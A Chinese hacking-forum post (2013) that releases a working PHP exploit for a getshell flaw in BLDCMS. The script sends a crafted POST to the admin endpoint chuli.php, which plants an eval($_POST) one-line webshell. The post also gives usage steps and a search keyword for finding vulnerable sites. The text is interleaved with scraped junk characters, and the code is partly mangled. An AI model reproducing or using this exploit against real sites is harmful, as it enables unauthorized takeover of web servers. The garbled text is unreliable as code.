之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞; g) x* D4 s; Y$ c/ T, }, p
7 a% a7 d* f7 |4 W2 A- |
9 h0 v- r& j4 e话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
- S7 I! U! O3 T' `* C2 ? $ _" I: D' K, y( o
既然都有人发了 我就把我之前写好的EXP放出来吧" U# G0 M! [0 R
2 G5 L& ]% ?0 N8 \( C) G
view source print?01.php;">
: e0 B. g8 D6 h* {0 \6 d0 X02.<!--?php- s' J3 D. [0 c m
03.echo "-------------------------------------------------------------------1 Y: T8 H* \7 `+ b3 @: P) b
04.
- x" o% z9 y) H) Q8 |% z6 k05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
8 P* X6 g) D6 n, v, p06. ( i/ m9 {7 G8 Q$ E/ N
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
5 [; I" C0 U% {08. 8 z. L" ^' E$ K5 B5 Z
09.QQ:981009941\r\n 2013.3.21\r\n
- v! Q2 O' M$ D1 ^, Q0 K7 f10.
1 [4 `: S/ Q- @11. 2 O* B5 P3 v. q. l( X* [4 X" m9 F
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
* G! T" z" R, N13. / K7 ^ h7 V3 Y
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
" w& L+ q! N, }15. . c2 ^# n% E, Y5 h. h
16.--------------------------------------------------------------------\r\n";- U+ T ]+ z/ f2 Y- ^
17.$url=$argv[1];3 Y) E# |- t/ ~" F2 w
18.$dir=$argv[2];3 `5 D/ c+ P9 Y# x8 [
19.$pass=$argv[3];
$ P! c( m; f, s' P! a+ L20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
7 C$ W7 n( S4 |8 z9 B( {21.if (emptyempty($pass)||emptyempty($url))+ n; u7 f9 \$ b. ^- Q1 f. u" G7 m
22.{exit("请输入参数");}
7 o7 l3 K* O9 u23.else0 l/ S* T& U( H$ h
24.{* N6 R! m+ K/ f3 u0 x) O
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
* U, V8 o& d/ i) t2 F: t26. ! ?2 g) E5 d" D/ z( _! Y
27.al;+ G6 I, l0 J3 D g2 l6 C
28.$length = strlen($fuckdata);$ q6 a& p& {/ V, Z
29.function getshell($url,$pass)$ c; l, z# P- O/ H' a" m9 k
30.{
. c) [6 R4 t5 `/ q# T; J" D31.global $url,$dir,$pass,$eval,$length,$fuckdata;% @( g; q' F' @' }
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
( D% o n/ w9 C( m. O' @33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";: J2 G' v* Q4 d6 Q# _
34.$header .= "User-Agent: MSIE\r\n";
9 E2 I4 t; }- t% \' _7 f35.$header .= "Host:".$url."\r\n";
0 A& Z+ H q- V0 T8 W& J; S36.$header .= "Content-Length: ".$length."\r\n";
# M# z" W" U& h2 L( w- J; r37.$header .= "Connection: Close\r\n";
* C0 e+ \8 t; t" b4 L38.$header .="\r\n";0 O0 N7 Q: U* G+ r
39.$header .= $fuckdata."\r\n\r\n";5 i% j( ]2 D- Q4 P% d) ^0 w0 J
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
1 H9 d6 D$ @- `. z: B, `41.if (!$fp)
% G5 i5 X7 u% P" ]1 y4 ?7 m2 j5 R' _. ]& ]42.{
& [# `6 O. w# @3 z& U$ w: v9 X43.exit ("利用失败:请检查指定目标是否能正常打开");
% w, k L8 t- y V44.}/ E5 i5 l) Y) [, \8 H$ o& L
45.else{ if (!fputs($fp,$header))
6 O6 t( O2 C( }) W% T& h! }. c46.{exit ("利用失败");}( h, S( d. f, B* j
47.else
( L6 a7 ?5 T5 ^48.{% _! @6 A2 ^5 ^; d1 h
49.$receive = '';; }# n/ _% p# |0 U2 W1 I
50.while (!feof($fp)) {
! V8 h8 \' w4 v51.$receive .= @fgets($fp, 1000);/ \# B6 p) h% r6 |3 Q
52.}
) q7 n4 ^# L% \ S/ n3 F53.@fclose($fp);
# S* r% I" `* a2 _54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
% g' N) m/ Q ]/ H4 c$ M55.
1 q9 R" U& r4 s4 j) d56.GPC是否=off)";
; P0 v% {5 ]8 X- i* D- @3 Z8 Y) S57.}}
/ L9 A* Y: z/ [3 ~ g5 L6 c58.}
+ ~! p) ~% T$ r3 O59.}2 Y# J+ C7 |2 g9 \3 X
60.getshell($url,$pass);3 e: E8 V! @" m6 {; w& ?
61.?-->
3 r; f: K: ^' w6 B# _" b1 l 9 ?) ], l/ ~5 q) f
7 s. W$ c5 l) T% R; x
& v# r( T3 a5 G K
by 数据流0 f8 U+ S4 b" |/ B
|
发表于 2013-3-26 20:49:10
收藏
支持
反对